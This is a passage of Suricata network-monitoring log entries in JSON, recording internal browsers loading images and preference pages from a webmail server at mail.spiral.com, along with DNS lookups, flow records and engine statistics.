Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/themes\/default\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":220},"app_proto":"http","fileinfo":{"filename":"\/themes\/default\/graphics\/edit-sidebar-fff.png","state":"CLOSED","stored":false,"size":220,"tx_id":10}} {"timestamp":"2020-02-29T00:03:09.272134+0000","flow_id":1452797018606239,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52668,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":11,"http":{"hostname":"mail.spiral.com","url":"\/themes\/default\/graphics\/checkbox_on.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/themes\/default\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":477}} {"timestamp":"2020-02-29T00:03:09.273149+0000","flow_id":1452797018606239,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52668,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/themes\/default\/graphics\/checkbox_on.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/themes\/default\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":477},"app_proto":"http","fileinfo":{"filename":"\/themes\/default\/graphics\/checkbox_on.png","state":"CLOSED","stored":false,"size":477,"tx_id":11}} {"timestamp":"2020-02-29T00:03:09.297306+0000","flow_id":1169518155910251,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52670,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":2,"http":{"hostname":"mail.spiral.com","url":"\/themes\/default\/graphics\/data.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/themes\/default\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":386}} {"timestamp":"2020-02-29T00:03:09.317382+0000","flow_id":1452797018606239,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52668,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":12,"http":{"hostname":"mail.spiral.com","url":"\/themes\/default\/graphics\/expand.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/themes\/default\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":234}} {"timestamp":"2020-02-29T00:03:09.333736+0000","flow_id":1452797018606239,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52668,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/themes\/default\/graphics\/expand.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/themes\/default\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":234},"app_proto":"http","fileinfo":{"filename":"\/themes\/default\/graphics\/expand.png","state":"CLOSED","stored":false,"size":234,"tx_id":12}} {"timestamp":"2020-02-29T00:03:09.334195+0000","flow_id":1452797018606239,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52668,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":13,"http":{"hostname":"mail.spiral.com","url":"\/nag\/themes\/default\/graphics\/favicon.ico","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/vnd.microsoft.icon","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":1742}} {"timestamp":"2020-02-29T00:03:12.486743+0000","flow_id":1392564397028430,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.130","dest_port":34716,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/services\/prefs.php?app=imp&group=delmove","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/services\/prefs.php?app=imp","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":5173},"app_proto":"http","fileinfo":{"filename":"\/services\/prefs.php","state":"CLOSED","stored":false,"size":21411,"tx_id":1}} {"timestamp":"2020-02-29T00:03:14.258675+0000","flow_id":1169518155910251,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52670,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/themes\/default\/graphics\/data.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/themes\/default\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":386},"app_proto":"http","fileinfo":{"filename":"\/themes\/default\/graphics\/data.png","state":"CLOSED","stored":false,"size":386,"tx_id":2}} {"timestamp":"2020-02-29T00:03:14.339998+0000","flow_id":1452797018606239,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52668,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/nag\/themes\/default\/graphics\/favicon.ico","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/vnd.microsoft.icon","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":1742},"app_proto":"http","fileinfo":{"filename":"\/nag\/themes\/default\/graphics\/favicon.ico","state":"CLOSED","stored":false,"size":1742,"tx_id":13}} {"timestamp":"2020-02-29T00:03:16.000265+0000","event_type":"stats","stats":{"uptime":13848,"capture":{"kernel_packets":132906,"kernel_drops":0},"decoder":{"pkts":132909,"bytes":92153610,"invalid":180,"ipv4":131476,"ipv6":8,"ethernet":132909,"raw":0,"null":0,"sll":0,"tcp":126450,"udp":4832,"sctp":0,"icmpv4":14,"icmpv6":8,"ppp":0,"pppoe":0,"gre":0,"vlan":0,"vlan_qinq":0,"teredo":0,"ipv4_in_ipv6":0,"ipv6_in_ipv6":0,"mpls":0,"avg_pkt_size":693,"max_pkt_size":1486,"erspan":0,"ipraw":{"invalid_ip_version":0},"ltnull":{"pkt_too_small":0,"unsupported_type":0},"dce":{"pkt_too_small":0}},"flow":{"memcap":0,"spare":10000,"emerg_mode_entered":0,"emerg_mode_over":0,"tcp_reuse":0,"memuse":7099360},"defrag":{"ipv4":{"fragments":0,"reassembled":0,"timeouts":0},"ipv6":{"fragments":0,"reassembled":0,"timeouts":0},"max_frag_hits":0},"tcp":{"sessions":2682,"ssn_memcap_drop":0,"pseudo":339,"pseudo_failed":0,"invalid_checksum":0,"no_flow":0,"syn":2698,"synack":2689,"rst":1194,"segment_memcap_drop":0,"stream_depth_reached":0,"reassembly_gap":138,"memuse":819200,"reassembly_memuse":12281632},"detect":{"alert":24},"app_layer":{"flow":{"http":1727,"ftp":0,"smtp":0,"tls":761,"ssh":0,"imap":0,"msn":0,"smb":0,"dcerpc_tcp":0,"dns_tcp":0,"failed_tcp":100,"dcerpc_udp":0,"dns_udp":2202,"failed_udp":108},"tx":{"http":4490,"smtp":0,"tls":0,"dns_tcp":0,"dns_udp":2279}},"flow_mgr":{"closed_pruned":2654,"new_pruned":15,"est_pruned":2245,"bypassed_pruned":0,"flows_checked":1,"flows_notimeout":1,"flows_timeout":0,"flows_timeout_inuse":0,"flows_removed":0,"rows_checked":65536,"rows_skipped":65535,"rows_empty":0,"rows_busy":0,"rows_maxlen":1},"dns":{"memuse":21823,"memcap_state":0,"memcap_global":0},"http":{"memuse":47133,"memcap":0}}} {"timestamp":"2020-02-29T00:03:17.000187+0000","flow_id":148780504013802,"event_type":"flow","src_ip":"192.168.10.122","src_port":56194,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","app_proto":"dns","flow":{"pkts_toserver":1,"pkts_toclient":1,"bytes_toserver":87,"bytes_toclient":142,"start":"2020-02-28T23:58:15.941034+0000","end":"2020-02-28T23:58:16.052379+0000","age":1,"state":"established","reason":"timeout","alerted":false}} {"timestamp":"2020-02-29T00:03:20.456707+0000","flow_id":97464254789635,"in_iface":"eth0","event_type":"dns","src_ip":"192.168.10.122","src_port":35466,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","dns":{"type":"query","id":16659,"rrname":"130.10.168.192.in-addr.arpa","rrtype":"PTR","tx_id":0}} {"timestamp":"2020-02-29T00:03:20.562100+0000","flow_id":97464254789635,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":35466,"proto":"UDP","dns":{"type":"answer","id":16659,"rcode":"NXDOMAIN","rrname":"130.10.168.192.in-addr.arpa"}} {"timestamp":"2020-02-29T00:03:20.562100+0000","flow_id":97464254789635,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":35466,"proto":"UDP","dns":{"type":"answer","id":16659,"rcode":"NXDOMAIN","rrname":"168.192.IN-ADDR.ARPA","rrtype":"SOA","ttl":20864}} {"timestamp":"2020-02-29T00:03:20.685840+0000","flow_id":1755149832342807,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.130","src_port":34718,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/services\/prefs.php","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/services\/prefs.php?app=imp&group=delmove","http_method":"POST","protocol":"HTTP\/1.1","status":200,"length":20},"app_proto":"http","fileinfo":{"filename":"\/services\/prefs.php","state":"CLOSED","stored":false,"size":197,"tx_id":0}} {"timestamp":"2020-02-29T00:03:20.701894+0000","flow_id":1755149832342807,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.130","src_port":34718,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":0,"http":{"hostname":"mail.spiral.com","url":"\/services\/prefs.php","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/services\/prefs.php?app=imp&group=delmove","http_method":"POST","protocol":"HTTP\/1.1","status":200,"length":5267}} {"timestamp":"2020-02-29T00:03:21.000204+0000","flow_id":1408258204220712,"event_type":"flow","src_ip":"192.168.10.81","src_port":52654,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","app_proto":"http","flow":{"pkts_toserver":20,"pkts_toclient":20,"bytes_toserver":5143,"bytes_toclient":14597,"start":"2020-02-29T00:02:11.900392+0000","end":"2020-02-29T00:02:20.574550+0000","age":9,"state":"closed","reason":"timeout","alerted":false},"tcp":{"tcp_flags":"1b","tcp_flags_ts":"1b","tcp_flags_tc":"1b","syn":true,"fin":true,"psh":true,"ack":true,"state":"closed"}} {"timestamp":"2020-02-29T00:03:21.000418+0000","flow_id":872675782682226,"event_type":"flow","src_ip":"192.168.10.81","src_port":52658,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","app_proto":"http","flow":{"pkts_toserver":5,"pkts_toclient":5,"bytes_toserver":843,"bytes_toclient":1539,"start":"2020-02-29T00:02:15.452210+0000","end":"2020-02-29T00:02:20.466510+0000","age":5,"state":"closed","reason":"timeout","alerted":false},"tcp":{"tcp_flags":"1b","tcp_flags_ts":"1b","tcp_flags_tc":"1b","syn":true,"fin":true,"psh":true,"ack":true,"state":"closed"}} {"timestamp":"2020-02-29T00:03:21.000519+0000","flow_id":1477475882025965,"event_type":"flow","src_ip":"192.168.10.122","src_port":45481,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","app_proto":"dns","flow":{"pkts_toserver":1,"pkts_toclient":1,"bytes_toserver":87,"bytes_toclient":142,"start":"2020-02-28T23:58:20.115693+0000","end":"2020-02-28T23:58:20.227236+0000","age":0,"state":"established","reason":"timeout","alerted":false}} {"timestamp":"2020-02-29T00:03:21.000682+0000","flow_id":246860392947698,"event_type":"flow","src_ip":"192.168.10.81","src_port":52656,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","app_proto":"http","flow":{"pkts_toserver":12,"pkts_toclient":11,"bytes_toserver":2743,"bytes_toclient":7902,"start":"2020-02-29T00:02:15.450546+0000","end":"2020-02-29T00:02:20.574521+0000","age":5,"state":"closed","reason":"timeout","alerted":false},"tcp":{"tcp_flags":"1b","tcp_flags_ts":"1b","tcp_flags_tc":"1b","syn":true,"fin":true,"psh":true,"ack":true,"state":"closed"}} {"timestamp":"2020-02-29T00:03:23.000217+0000","event_type":"stats","stats":{"uptime":13855,"capture":{"kernel_packets":132918,"kernel_drops":0},"decoder":{"pkts":132932,"bytes":92161692,"invalid":180,"ipv4":131499,"ipv6":8,"ethernet":132932,"raw":0,"null":0,"sll":0,"tcp":126471,"udp":4834,"sctp":0,"icmpv4":14,"icmpv6":8,"ppp":0,"pppoe":0,"gre":0,"vlan":0,"vlan_qinq":0,"teredo":0,"ipv4_in_ipv6":0,"ipv6_in_ipv6":0,"mpls":0,"avg_pkt_size":693,"max_pkt_size":1486,"erspan":0,"ipraw":{"invalid_ip_version":0},"ltnull":{"pkt_too_small":0,"unsupported_type":0},"dce":{"pkt_too_small":0}},"flow":{"memcap":0,"spare":10004,"emerg_mode_entered":0,"emerg_mode_over":0,"tcp_reuse":0,"memuse":7098496},"defrag":{"ipv4":{"fragments":0,"reassembled":0,"timeouts":0},"ipv6":{"fragments":0,"reassembled":0,"timeouts":0},"max_frag_hits":0},"tcp":{"sessions":2683,"ssn_memcap_drop":0,"pseudo":339,"pseudo_failed":0,"invalid_checksum":0,"no_flow":0,"syn":2699,"synack":2690,"rst":1194,"segment_memcap_drop":0,"stream_depth_reached":0,"reassembly_gap":138,"memuse":819200,"reassembly_memuse":12281632},"detect":{"alert":24},"app_layer":{"flow":{"http":1728,"ftp":0,"smtp":0,"tls":761,"ssh":0,"imap":0,"msn":0,"smb":0,"dcerpc_tcp":0,"dns_tcp":0,"failed_tcp":100,"dcerpc_udp":0,"dns_udp":2203,"failed_udp":108},"tx":{"http":4491,"smtp":0,"tls":0,"dns_tcp":0,"dns_udp":2280}},"flow_mgr":{"closed_pruned":2657,"new_pruned":15,"est_pruned":2247,"bypassed_pruned":0,"flows_checked":6,"flows_notimeout":2,"flows_timeout":4,"flows_timeout_inuse":0,"flows_removed":4,"rows_checked":65536,"rows_skipped":65530,"rows_empty":0,"rows_busy":0,"rows_maxlen":1},"dns":{"memuse":21492,"memcap_state":0,"memcap_global":0},"http":{"memuse":102937,"memcap":0}}} {"timestamp":"2020-02-29T00:03:25.000544+0000","flow_id":359534564994154,"event_type":"flow","src_ip":"192.168.10.81","src_port":52660,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","app_proto":"http","flow":{"pkts_toserver":19,"pkts_toclient":21,"bytes_toserver":4143,"bytes_toclient":20807,"start":"2020-02-29T00:02:15.453738+0000","end":"2020-02-29T00:02:24.404757+0000","age":9,"state":"closed","reason":"timeout","alerted":false},"tcp":{"tcp_flags":"1b","tcp_flags_ts":"1b","tcp_flags_tc":"1b","syn":true,"fin":true,"psh":true,"ack":true,"state":"closed"}} {"timestamp":"2020-02-29T00:03:25.702845+0000","flow_id":1755149832342807,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.130","dest_port":34718,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/services\/prefs.php","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/services\/prefs.php?app=imp&group=delmove","http_method":"POST","protocol":"HTTP\/1.1","status":200,"length":5267},"app_proto":"http","fileinfo":{"filename":"\/services\/prefs.php","state":"CLOSED","stored":false,"size":21565,"tx_id":0}} {"timestamp":"2020-02-29T00:03:29.000556+0000","flow_id":2170112373483042,"event_type":"flow","src_ip":"192.168.10.122","src_port":56279,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","app_proto":"dns","flow":{"pkts_toserver":1,"pkts_toclient":1,"bytes_toserver":87,"bytes_toclient":142,"start":"2020-02-28T23:58:28.583202+0000","end":"2020-02-28T23:58:28.694600+0000","age":0,"state":"established","reason":"timeout","alerted":false}} {"timestamp":"2020-02-29T00:03:30.000154+0000","event_type":"stats","stats":{"uptime":13862,"capture":{"kernel_packets":132932,"kernel_drops":0},"decoder":{"pkts":132935,"bytes":92161890,"invalid":180,"ipv4":131502,"ipv6":8,"ethernet":132935,"raw":0,"null":0,"sll":0,"tcp":126474,"udp":4834,"sctp":0,"icmpv4":14,"icmpv6":8,"ppp":0,"pppoe":0,"gre":0,"vlan":0,"vlan_qinq":0,"teredo":0,"ipv4_in_ipv6":0,"ipv6_in_ipv6":0,"mpls":0,"avg_pkt_size":693,"max_pkt_size":1486,"erspan":0,"ipraw":{"invalid_ip_version":0},"ltnull":{"pkt_too_small":0,"unsupported_type":0},"dce":{"pkt_too_small":0}},"flow":{"memcap":0,"spare":10000,"emerg_mode_entered":0,"emerg_mode_over":0,"tcp_reuse":0,"memuse":7098208},"defrag":{"ipv4":{"fragments":0,"reassembled":0,"timeouts":0},"ipv6":{"fragments":0,"reassembled":0,"timeouts":0},"max_frag_hits":0},"tcp":{"sessions":2683,"ssn_memcap_drop":0,"pseudo":339,"pseudo_failed":0,"invalid_checksum":0,"no_flow":0,"syn":2699,"synack":2690,"rst":1194,"segment_memcap_drop":0,"stream_depth_reached":0,"reassembly_gap":138,"memuse":819200,"reassembly_memuse":12281632},"detect":{"alert":24},"app_layer":{"flow":{"http":1728,"ftp":0,"smtp":0,"tls":761,"ssh":0,"imap":0,"msn":0,"smb":0,"dcerpc_tcp":0,"dns_tcp":0,"failed_tcp":100,"dcerpc_udp":0,"dns_udp":2203,"failed_udp":108},"tx":{"http":4491,"smtp":0,"tls":0,"dns_tcp":0,"dns_udp":2280}},"flow_mgr":{"closed_pruned":2658,"new_pruned":15,"est_pruned":2247,"bypassed_pruned":0,"flows_checked":0,"flows_notimeout":0,"flows_timeout":0,"flows_timeout_inuse":0,"flows_removed":0,"rows_checked":65536,"rows_skipped":65536,"rows_empty":0,"rows_busy":0,"rows_maxlen":0},"dns":{"memuse":21161,"memcap_state":0,"memcap_global":0},"http":{"memuse":46893,"memcap":0}}} {"timestamp":"2020-02-29T00:03:30.001254+0000","flow_id":1530510154133066,"event_type":"flow","src_ip":"192.168.10.130","src_port":34700,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","app_proto":"http","flow":{"pkts_toserver":7,"pkts_toclient":9,"bytes_toserver":1030,"bytes_toclient":7104,"start":"2020-02-29T00:02:23.847434+0000","end":"2020-02-29T00:02:29.118708+0000","age":6,"state":"closed","reason":"timeout","alerted":false},"tcp":{"tcp_flags":"1b","tcp_flags_ts":"1b","tcp_flags_tc":"1b","syn":true,"fin":true,"psh":true,"ack":true,"state":"closed"}} {"timestamp":"2020-02-29T00:03:32.247963+0000","flow_id":282835044059291,"in_iface":"eth0","event_type":"dns","src_ip":"192.168.10.122","src_port":46479,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","dns":{"type":"query","id":36024,"rrname":"130.10.168.192.in-addr.arpa","rrtype":"PTR","tx_id":0}} {"timestamp":"2020-02-29T00:03:32.359559+0000","flow_id":282835044059291,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":46479,"proto":"UDP","dns":{"type":"answer","id":36024,"rcode":"NXDOMAIN","rrname":"130.10.168.192.in-addr.arpa"}} {"timestamp":"2020-02-29T00:03:32.359559+0000","flow_id":282835044059291,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":46479,"proto":"UDP","dns":{"type":"answer","id":36024,"rcode":"NXDOMAIN","rrname":"168.192.IN-ADDR.ARPA","rrtype":"SOA","ttl":20864}} {"timestamp":"2020-02-29T00:03:32.520894+0000","flow_id":686372991301585,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.130","src_port":34720,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/services\/prefs.php","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/services\/prefs.php","http_method":"POST","protocol":"HTTP\/1.1","status":200,"length":20},"app_proto":"http","fileinfo":{"filename":"\/services\/prefs.php","state":"CLOSED","stored":false,"size":197,"tx_id":0}} {"timestamp":"2020-02-29T00:03:32.537272+0000","flow_id":686372991301585,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.130","src_port":34720,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":0,"http":{"hostname":"mail.spiral.com","url":"\/services\/prefs.php","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/services\/prefs.php","http_method":"POST","protocol":"HTTP\/1.1","status":200,"length":5269}} {"timestamp":"2020-02-29T00:03:33.000689+0000","flow_id":950942972546480,"event_type":"flow","src_ip":"192.168.10.81","src_port":52662,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","app_proto":"failed","app_proto_tc":"http","flow":{"pkts_toserver":5,"pkts_toclient":5,"bytes_toserver":314,"bytes_toclient":817,"start":"2020-02-29T00:02:28.560560+0000","end":"2020-02-29T00:02:28.994268+0000","age":0,"state":"closed","reason":"timeout","alerted":false},"tcp":{"tcp_flags":"1f","tcp_flags_ts":"17","tcp_flags_tc":"1b","syn":true,"fin":true,"rst":true,"psh":true,"ack":true,"state":"closed"}} {"timestamp":"2020-02-29T00:03:34.000485+0000","flow_id":1466343343045982,"event_type":"flow","src_ip":"192.168.10.81","src_port":52666,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","flow":{"pkts_toserver":4,"pkts_toclient":2,"bytes_toserver":272,"bytes_toclient":140,"start":"2020-02-29T00:02:28.572766+0000","end":"2020-02-29T00:02:33.574149+0000","age":5,"state":"closed","reason":"timeout","alerted":false},"tcp":{"tcp_flags":"13","tcp_flags_ts":"13","tcp_flags_tc":"13","syn":true,"fin":true,"ack":true,"state":"closed"}} {"timestamp":"2020-02-29T00:03:34.000756+0000","flow_id":1520949557243714,"event_type":"flow","src_ip":"192.168.10.81","src_port":52664,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","app_proto":"http","flow":{"pkts_toserver":8,"pkts_toclient":7,"bytes_toserver":1395,"bytes_toclient":2845,"start":"2020-02-29T00:02:28.569154+0000","end":"2020-02-29T00:02:33.575181+0000","age":5,"state":"closed","reason":"timeout","alerted":false},"tcp":{"tcp_flags":"1b","tcp_flags_ts":"1b","tcp_flags_tc":"1b","syn":true,"fin":true,"psh":true,"ack":true,"state":"closed"}} {"timestamp":"2020-02-29T00:03:37.000214+0000","event_type":"stats","stats":{"uptime":13869,"capture":{"kernel_packets":132938,"kernel_drops":0},"decoder":{"pkts":132952,"bytes":92169556,"invalid":180,"ipv4":131519,"ipv6":8,"ethernet":132952,"raw":0,"null":0,"sll":0,"tcp":126489,"udp":4836,"sctp":0,"icmpv4":14,"icmpv6":8,"ppp":0,"pppoe":0,"gre":0,"vlan":0,"vlan_qinq":0,"teredo":0,"ipv4_in_ipv6":0,"ipv6_in_ipv6":0,"mpls":0,"avg_pkt_size":693,"max_pkt_size":1486,"erspan":0,"ipraw":{"invalid_ip_version":0},"ltnull":{"pkt_too_small":0,"unsupported_type":0},"dce":{"pkt_too_small":0}},"flow":{"memcap":0,"spare":10000,"emerg_mode_entered":0,"emerg_mode_over":0,"tcp_reuse":0,"memuse":7097344},"defrag":{"ipv4":{"fragments":0,"reassembled":0,"timeouts":0},"ipv6":{"fragments":0,"reassembled":0,"timeouts":0},"max_frag_hits":0},"tcp":{"sessions":2684,"ssn_memcap_drop":0,"pseudo":339,"pseudo_failed":0,"invalid_checksum":0,"no_flow":0,"syn":2700,"synack":2691,"rst":1194,"segment_memcap_drop":0,"stream_depth_reached":0,"reassembly_gap":138,"memuse":819200,"reassembly_memuse":12281632},"detect":{"alert":24},"app_layer":{"flow":{"http":1729,"ftp":0,"smtp":0,"tls":761,"ssh":0,"imap":0,"msn":0,"smb":0,"dcerpc_tcp":0,"dns_tcp":0,"failed_tcp":101,"dcerpc_udp":0,"dns_udp":2204,"failed_udp":108},"tx":{"http":4492,"smtp":0,"tls":0,"dns_tcp":0,"dns_udp":2281}},"flow_mgr":{"closed_pruned":2662,"new_pruned":15,"est_pruned":2248,"bypassed_pruned":0,"flows_checked":0,"flows_notimeout":0,"flows_timeout":0,"flows_timeout_inuse":0,"flows_removed":0,"rows_checked":65536,"rows_skipped":65534,"rows_empty":2,"rows_busy":0,"rows_maxlen":0},"dns":{"memuse":21492,"memcap_state":0,"memcap_global":0},"http":{"memuse":102755,"memcap":0}}} {"timestamp":"2020-02-29T00:03:37.538019+0000","flow_id":686372991301585,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.130","dest_port":34720,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/services\/prefs.php","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/services\/prefs.php","http_method":"POST","protocol":"HTTP\/1.1","status":200,"length":5269},"app_proto":"http","fileinfo":{"filename":"\/services\/prefs.php","state":"CLOSED","stored":false,"size":21565,"tx_id":0}} {"timestamp":"2020-02-29T00:03:39.000249+0000","flow_id":432102333557313,"event_type":"flow","src_ip":"192.168.10.130","src_port":34702,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","app_proto":"http","flow":{"pkts_toserver":9,"pkts_toclient":7,"bytes_toserver":1101,"bytes_toclient":4128,"start":"2020-02-29T00:02:33.535105+0000","end":"2020-02-29T00:02:38.758339+0000","age":5,"state":"closed","reason":"timeout","alerted":false},"tcp":{"tcp_flags":"1b","tcp_flags_ts":"1b","tcp_flags_tc":"1b","syn":true,"fin":true,"psh":true,"ack":true,"state":"closed"}} {"timestamp":"2020-02-29T00:03:40.000465+0000","flow_id":484492329315239,"event_type":"flow","src_ip":"192.168.10.122","src_port":51089,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","app_proto":"dns","flow":{"pkts_toserver":1,"pkts_toclient":1,"bytes_toserver":87,"bytes_toclient":142,"start":"2020-02-28T23:58:39.486311+0000","end":"2020-02-28T23:58:39.597883+0000","age":0,"state":"established","reason":"timeout","alerted":false}} {"timestamp":"2020-02-29T00:03:42.000363+0000","flow_id":1857713646178395,"event_type":"flow","src_ip":"192.168.10.130","src_port":34698,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","app_proto":"http","flow":{"pkts_toserver":15,"pkts_toclient":23,"bytes_toserver":3176,"bytes_toclient":19569,"start":"2020-02-29T00:02:01.561243+0000","end":"2020-02-29T00:02:41.127250+0000","age":40,"state":"closed","reason":"timeout","alerted":false},"tcp":{"tcp_flags":"1b","tcp_flags_ts":"1b","tcp_flags_tc":"1b","syn":true,"fin":true,"psh":true,"ack":true,"state":"closed"}} {"timestamp":"2020-02-29T00:03:42.001453+0000","flow_id":273776938932889,"event_type":"flow","src_ip":"192.168.10.122","src_port":42956,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","app_proto":"dns","flow":{"pkts_toserver":1,"pkts_toclient":1,"bytes_toserver":86,"bytes_toclient":141,"start":"2020-02-28T23:58:41.744089+0000","end":"2020-02-28T23:58:41.855799+0000","age":0,"state":"established","reason":"timeout","alerted":false}} 